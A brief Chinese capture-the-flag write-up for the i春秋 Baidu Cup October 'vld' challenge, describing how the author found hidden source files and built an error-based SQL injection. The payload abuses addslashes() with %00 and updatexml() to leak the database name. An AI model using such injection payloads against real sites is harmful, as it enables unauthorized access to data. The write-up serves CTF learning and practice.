i春秋-百度杯十月场-vld

时间:2024-09-17 19:36:44

查看源码,有提示,index.php.txt  ,  进入得到文本。i春秋-百度杯十月场-vld

不太看得懂,后来百度,大致就是,flag1=.......&flag2=......&flag3=...... ,传给index.php.

得到下一步,1chunqiu.zip。下载下来,查看源码。

可能知识太少,没看出什么,参考一下大佬的答案后,得知利用两个地方可以构造注入:

i春秋-百度杯十月场-vldi春秋-百度杯十月场-vld

addslashes()这个函数,能使%00转义为\0,而trim()函数又消除username与number相同的字符串。

构造:number=0&username=a%00' or updatexml(1,concat(2,(select database()),2),1)%23&password=1&submit=submit

注入语句,脑补。。。。